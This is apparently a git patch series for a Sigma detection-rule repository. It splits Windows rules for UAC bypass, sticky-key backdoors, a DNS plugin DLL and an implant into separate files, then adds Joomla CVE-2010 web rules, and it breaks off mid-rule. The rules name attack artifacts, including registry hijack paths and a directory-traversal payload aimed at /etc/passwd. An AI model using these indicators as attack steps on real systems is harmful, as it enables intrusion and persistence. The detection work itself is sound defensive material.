25ffa65d-76d8-4da5-a832-3f2b0136e133 -logsource: - product: windows - category: registry_event -detection: - selection1: - TargetObject|endswith: '\EulaAccepted' - condition: 1 of them ---- -id: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b logsource: category: process_creation product: windows detection: - selection2: + selection: CommandLine|contains: ' -accepteula' - condition: 1 of them + condition: selection +falsepositives: + - Legitimate use of SysInternals tools + - Programs that use the same Registry Key +level: low \ No newline at end of file diff --git a/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml b/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml old mode 100755 new mode 100644 similarity index 73% rename from rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml rename to rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml index ed8f6054..a0f16d53 --- a/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml +++ b/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml @@ -1,5 +1,8 @@ -action: global title: UAC Bypass via Event Viewer +id: be344333-921d-4c4d-8bb8-e584cf584780 +related: + - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 + type: derived status: experimental description: Detects UAC bypass method using Windows event viewer references: @@ -7,28 +10,13 @@ references: - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 author: Florian Roth date: 2017/03/19 -modified: 2020/09/06 +modified: 2021/09/12 tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1088 # an old one - attack.t1548.002 - car.2019-04-001 -falsepositives: - - unknown -level: critical ---- -id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 -logsource: - product: windows - category: registry_event -detection: - methregistry: - TargetObject|startswith: 'HKU\' - TargetObject|endswith: '\mscfile\shell\open\command' - condition: methregistry ---- -id: be344333-921d-4c4d-8bb8-e584cf584780 logsource: category: process_creation product: windows @@ -41,3 +29,6 @@ detection: fields: - CommandLine - ParentCommandLine +falsepositives: + - unknown +level: critical \ No newline at end of file diff --git a/rules/windows/registry_event/registry_event_sysinternals_eula_accepted.yml b/rules/windows/registry_event/registry_event_sysinternals_eula_accepted.yml new file mode 100755 index 00000000..2865be13 --- /dev/null +++ b/rules/windows/registry_event/registry_event_sysinternals_eula_accepted.yml @@ -0,0 +1,23 @@ +title: Usage of Sysinternals Tools +id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 +status: experimental +description: Detects the usage of Sysinternals Tools due to accepteula key being added to Registry +references: + - https://twitter.com/Moti_B/status/1008587936735035392 +date: 2017/08/28 +modified: 2021/09/12 +author: Markus Neis +tags: + - attack.resource_development + - attack.t1588.002 +logsource: + product: windows + category: registry_event +detection: + selection: + TargetObject|endswith: '\EulaAccepted' + condition: selection +falsepositives: + - Legitimate use of SysInternals tools + - Programs that use the same Registry Key +level: low \ No newline at end of file diff --git a/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml b/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml new file mode 100755 index 00000000..bdbd285e --- /dev/null +++ b/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml @@ -0,0 +1,27 @@ +title: UAC Bypass via Event Viewer +id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 +status: experimental +description: Detects UAC bypass method using Windows event viewer +references: + - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 +author: Florian Roth +date: 2017/03/19 +modified: 2021/09/12 +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1088 # an old one + - attack.t1548.002 + - car.2019-04-001 +logsource: + product: windows + category: registry_event +detection: + methregistry: + TargetObject|startswith: 'HKU\' + TargetObject|endswith: '\mscfile\shell\open\command' + condition: methregistry +falsepositives: + - unknown +level: critical \ No newline at end of file From f3ad5953d5eec1d1cb000e36bd8d04c817ed1bd7 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 12 Sep 2021 09:42:11 +0200 Subject: [PATCH 0882/1367] split sysmon_apt_pandemic --- .../process_creation_apt_pandemic.yml | 33 +++++++++++++++++ ...ic.yml => registry_event_apt_pandemic.yml} | 36 +++++++------------ 2 files changed, 46 insertions(+), 23 deletions(-) create mode 100644 rules/windows/process_creation/process_creation_apt_pandemic.yml rename rules/windows/registry_event/{sysmon_apt_pandemic.yml => registry_event_apt_pandemic.yml} (68%) diff --git a/rules/windows/process_creation/process_creation_apt_pandemic.yml b/rules/windows/process_creation/process_creation_apt_pandemic.yml new file mode 100644 index 00000000..9f0add88 --- /dev/null +++ b/rules/windows/process_creation/process_creation_apt_pandemic.yml @@ -0,0 +1,33 @@ +title: Pandemic Registry Key +id: 9fefd33c-339d-4495-9cba-b96ca006f512 +related: + - id: 47e0852a-cf81-4494-a8e6-31864f8c86ed + type: derived +status: experimental +description: Detects Pandemic Windows Implant +references: + - https://wikileaks.org/vault7/#Pandemic + - https://twitter.com/MalwareJake/status/870349480356454401 +tags: + - attack.lateral_movement + - attack.t1105 +author: Florian Roth +date: 2017/06/01 +modified: 2021/09/12 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: 'loaddll -a ' + condition: selection +falsepositives: + - unknown +level: critical +fields: + - EventID + - CommandLine + - ParentCommandLine + - Image + - User + - TargetObject \ No newline at end of file diff --git a/rules/windows/registry_event/sysmon_apt_pandemic.yml b/rules/windows/registry_event/registry_event_apt_pandemic.yml similarity index 68% rename from rules/windows/registry_event/sysmon_apt_pandemic.yml rename to rules/windows/registry_event/registry_event_apt_pandemic.yml index e0f2d122..eef303ef 100755 --- a/rules/windows/registry_event/sysmon_apt_pandemic.yml +++ b/rules/windows/registry_event/registry_event_apt_pandemic.yml @@ -1,5 +1,5 @@ -action: global title: Pandemic Registry Key +id: 47e0852a-cf81-4494-a8e6-31864f8c86ed status: experimental description: Detects Pandemic Windows Implant references: @@ -10,31 +10,21 @@ tags: - attack.t1105 author: Florian Roth date: 2017/06/01 +modified: 2021/09/12 +logsource: + category: registry_event + product: windows +detection: + selection: + TargetObject|contains: '\SYSTEM\CurrentControlSet\services\null\Instance' + condition: selection +falsepositives: + - unknown +level: critical fields: - EventID - CommandLine - ParentCommandLine - Image - User - - TargetObject -falsepositives: - - unknown -level: critical ---- -id: 47e0852a-cf81-4494-a8e6-31864f8c86ed -logsource: - category: registry_event - product: windows -detection: - selection1: - TargetObject|contains: '\SYSTEM\CurrentControlSet\services\null\Instance' - condition: 1 of them ---- -id: 9fefd33c-339d-4495-9cba-b96ca006f512 -logsource: - category: process_creation - product: windows -detection: - selection2: - CommandLine|contains: 'loaddll -a ' - condition: 1 of them + - TargetObject \ No newline at end of file From 81c2b2731ce7031778aa4d940b05925b34e0b2c3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 12 Sep 2021 09:53:20 +0200 Subject: [PATCH 0883/1367] split sysmon_dns_serverlevelplugindll.yml --- ...ess_creation_dns_serverlevelplugindll.yml} | 40 ++++++++----------- ...egistry_event_dns_serverlevelplugindll.yml | 32 +++++++++++++++ 2 files changed, 48 insertions(+), 24 deletions(-) rename rules/windows/{registry_event/sysmon_dns_serverlevelplugindll.yml => process_creation/process_creation_dns_serverlevelplugindll.yml} (73%) mode change 100755 => 100644 create mode 100755 rules/windows/registry_event/registry_event_dns_serverlevelplugindll.yml diff --git a/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml b/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml old mode 100755 new mode 100644 similarity index 73% rename from rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml rename to rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml index a40600b8..006a7560 --- a/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml +++ b/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml @@ -1,39 +1,21 @@ -action: global title: DNS ServerLevelPluginDll Install +id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 +related: + - id: e61e8a88-59a9-451c-874e-70fcc9740d67 + type: derived status: experimental description: Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required) references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 date: 2017/05/08 -modified: 2020/09/06 +modified: 2021/09/12 author: Florian Roth tags: - attack.defense_evasion - attack.t1073 # an old one - attack.t1574.002 - attack.t1112 -fields: - - EventID - - CommandLine - - ParentCommandLine - - Image - - User - - TargetObject -falsepositives: - - unknown -level: high ---- -id: e61e8a88-59a9-451c-874e-70fcc9740d67 -logsource: - product: windows - category: registry_event -detection: - dnsregmod: - TargetObject|endswith: '\services\DNS\Parameters\ServerLevelPluginDll' - condition: 1 of them ---- -id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 logsource: category: process_creation product: windows @@ -43,4 +25,14 @@ detection: CommandLine|contains|all: - '/config' - '/serverlevelplugindll' - condition: 1 of them + condition: dnsadmin +falsepositives: + - unknown +level: high +fields: + - EventID + - CommandLine + - ParentCommandLine + - Image + - User + - TargetObject \ No newline at end of file diff --git a/rules/windows/registry_event/registry_event_dns_serverlevelplugindll.yml b/rules/windows/registry_event/registry_event_dns_serverlevelplugindll.yml new file mode 100755 index 00000000..fc25febc --- /dev/null +++ b/rules/windows/registry_event/registry_event_dns_serverlevelplugindll.yml @@ -0,0 +1,32 @@ +title: DNS ServerLevelPluginDll Install +id: e61e8a88-59a9-451c-874e-70fcc9740d67 +status: experimental +description: Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server + (restart required) +references: + - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 +date: 2017/05/08 +modified: 2021/09/12 +author: Florian Roth +tags: + - attack.defense_evasion + - attack.t1073 # an old one + - attack.t1574.002 + - attack.t1112 +logsource: + product: windows + category: registry_event +detection: + dnsregmod: + TargetObject|endswith: '\services\DNS\Parameters\ServerLevelPluginDll' + condition: dnsregmod +falsepositives: + - unknown +level: high +fields: + - EventID + - CommandLine + - ParentCommandLine + - Image + - User + - TargetObject \ No newline at end of file From 437ea3408be84e0992e37cbeef1a063d47da06d9 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 12 Sep 2021 09:58:43 +0200 Subject: [PATCH 0884/1367] split sysmon_stickykey_like_backdoor.yml --- ...ocess_creation_stickykey_like_backdoor.yml | 37 +++++++++++++++++++ ...egistry_event_stickykey_like_backdoor.yml} | 31 +++------------- 2 files changed, 43 insertions(+), 25 deletions(-) create mode 100644 rules/windows/process_creation/process_creation_stickykey_like_backdoor.yml rename rules/windows/registry_event/{sysmon_stickykey_like_backdoor.yml => registry_event_stickykey_like_backdoor.yml} (73%) diff --git a/rules/windows/process_creation/process_creation_stickykey_like_backdoor.yml b/rules/windows/process_creation/process_creation_stickykey_like_backdoor.yml new file mode 100644 index 00000000..6e9c71ef --- /dev/null +++ b/rules/windows/process_creation/process_creation_stickykey_like_backdoor.yml @@ -0,0 +1,37 @@ +title: Sticky Key Like Backdoor Usage +id: 2fdefcb3-dbda-401e-ae23-f0db027628bc +related: + - id: baca5663-583c-45f9-b5dc-ea96a22ce542 + type: derived +description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login + screen +references: + - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ +tags: + - attack.privilege_escalation + - attack.persistence + - attack.t1015 # an old one + - attack.t1546.008 + - car.2014-11-003 + - car.2014-11-008 +author: Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community +date: 2018/03/15 +modified: 2021/09/12 +logsource: + category: process_creation + product: windows +detection: + selection_process: + ParentImage|endswith: '\winlogon.exe' + Image|endswith: '\cmd.exe' + CommandLine|contains: + - 'sethc.exe' + - 'utilman.exe' + - 'osk.exe' + - 'Magnify.exe' + - 'Narrator.exe' + - 'DisplaySwitch.exe' + condition: selection_process +falsepositives: + - Unlikely +level: critical \ No newline at end of file diff --git a/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml b/rules/windows/registry_event/registry_event_stickykey_like_backdoor.yml similarity index 73% rename from rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml rename to rules/windows/registry_event/registry_event_stickykey_like_backdoor.yml index eeaeb2cf..2ec90b7c 100755 --- a/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml +++ b/rules/windows/registry_event/registry_event_stickykey_like_backdoor.yml @@ -1,5 +1,5 @@ -action: global title: Sticky Key Like Backdoor Usage +id: baca5663-583c-45f9-b5dc-ea96a22ce542 description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen references: @@ -13,12 +13,7 @@ tags: - car.2014-11-008 author: Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community date: 2018/03/15 -modified: 2020/11/28 -falsepositives: - - Unlikely -level: critical ---- -id: baca5663-583c-45f9-b5dc-ea96a22ce542 +modified: 2021/09/12 logsource: category: registry_event product: windows @@ -31,21 +26,7 @@ detection: - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger' - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe\Debugger' - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger' - condition: 1 of them ---- -id: 2fdefcb3-dbda-401e-ae23-f0db027628bc -logsource: - category: process_creation - product: windows -detection: - selection_process: - ParentImage|endswith: '\winlogon.exe' - Image|endswith: '\cmd.exe' - CommandLine|contains: - - 'sethc.exe' - - 'utilman.exe' - - 'osk.exe' - - 'Magnify.exe' - - 'Narrator.exe' - - 'DisplaySwitch.exe' - condition: 1 of them + condition: selection_registry +falsepositives: + - Unlikely +level: critical \ No newline at end of file From 014ac2d24e5adcaf9cb94b613118399988ca58e1 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sun, 12 Sep 2021 18:09:14 +0530 Subject: [PATCH 0885/1367] Modifying Rules --- ...eb_cve-2010-0943_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-0944_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-0985_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1219_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1304_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1305_exploitation_attempt.yaml | 25 +++++++++++++++++ ...eb_cve-2010-1306_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1307_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1308_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1312_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1313_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1314_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1345_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1353_exploitation_attempt.yaml | 23 ++++++++++++++++ ...eb_cve-2010-1354_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1470_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1471_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1472_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1473_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1474_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1475_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1476_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1494_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1495_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1532_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1533_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1534_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1535_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1601_exploitation_attempt.yaml | 23 ++++++++++++++++ ...eb_cve-2010-1602_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1607_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1657_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1659_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1714_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1717_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1718_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1719_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1722_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1875_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1953_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1954_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1955_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1956_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1979_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1980_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1981_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1983_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2033_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2034_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2035_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2036_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2122_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2259_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2307_exploitation_attempt.yaml | 25 +++++++++++++++++ ...eb_cve-2010-2682_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2861_exploitation_attempt.yaml | 25 +++++++++++++++++ ...eb_cve-2010-2920_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-3426_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-4231_exploitation_attempt.yaml | 23 ++++++++++++++++ ...eb_cve-2010-4617_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-5278_exploitation_attempt.yaml | 24 +++++++++++++++++ ...ve_CVE-2010-0943_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-0944_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1306_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-1314_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-1345_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-1353_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1474_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-1475_exploitation_attempt.yaml | 24 ----------------- ...ve_CVE-2010-1495_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1532_exploitation_attempt.yaml | 24 ----------------- ...ve_CVE-2010-1533_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-1535_exploitation_attempt.yaml | 24 ----------------- ...ve_CVE-2010-1602_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-1657_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1718_exploitation_attempt.yaml | 24 ----------------- ...ve_CVE-2010-1722_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1875_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-1953_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1954_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-1955_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1979_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1983_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-2033_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-2036_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-2259_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-2307_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-2682_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-2861_exploitation_attempt.yaml | 27 ------------------- ...ve_CVE-2010-3426_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-4231_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-4617_exploitation_attempt.yaml | 25 ----------------- 92 files changed, 1464 insertions(+), 768 deletions(-) create mode 100644 rules/web/web_cve-2010-0943_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-0944_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-0985_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1219_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1304_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1305_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1306_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1307_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1308_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1312_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1313_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1314_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1345_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1353_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1354_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1470_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1471_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1472_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1473_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1474_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1475_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1476_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1494_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1495_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1532_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1533_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1534_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1535_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1601_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1602_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1607_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1657_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1659_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1714_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1717_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1718_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1719_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1722_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1875_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1953_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1954_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1955_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1956_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1979_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1980_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1981_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1983_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2033_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2034_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2035_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2036_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2122_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2259_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2307_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2682_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2861_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2920_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-3426_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-4231_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-4617_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-5278_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml diff --git a/rules/web/web_cve-2010-0943_exploitation_attempt.yaml b/rules/web/web_cve-2010-0943_exploitation_attempt.yaml new file mode 100644 index 00000000..52d23982 --- /dev/null +++ b/rules/web/web_cve-2010-0943_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-0943 exploitation attempt +id: 7341b3ab-aed8-470b-b3b3-baee54357b21 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component com_jashowcase - Directory Traversal:Directory traversal + vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote + attackers to read arbitrary files via a .. (dot dot) in the controller parameter + in a jashowcase action to index.php. +references: + - https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: + - Scanning from Nuclei + - Penetration Testing Activity + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/rules/web/web_cve-2010-0944_exploitation_attempt.yaml b/rules/web/web_cve-2010-0944_exploitation_attempt.yaml new file mode 100644 index 00000000..3bcd121b --- /dev/null +++ b/rules/web/web_cve-2010-0944_exploitation_attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-0944 exploitation attempt +id: 99eb6dd1-7eef-4210-862c-a4289b0eb3c1 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: Joomla! Component com_jcollection - Directory Traversal:Directory traversal + vulnerability in the JCollection (com_jcollection) component for Joomla! allows + remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter + to index.php. +references: + - 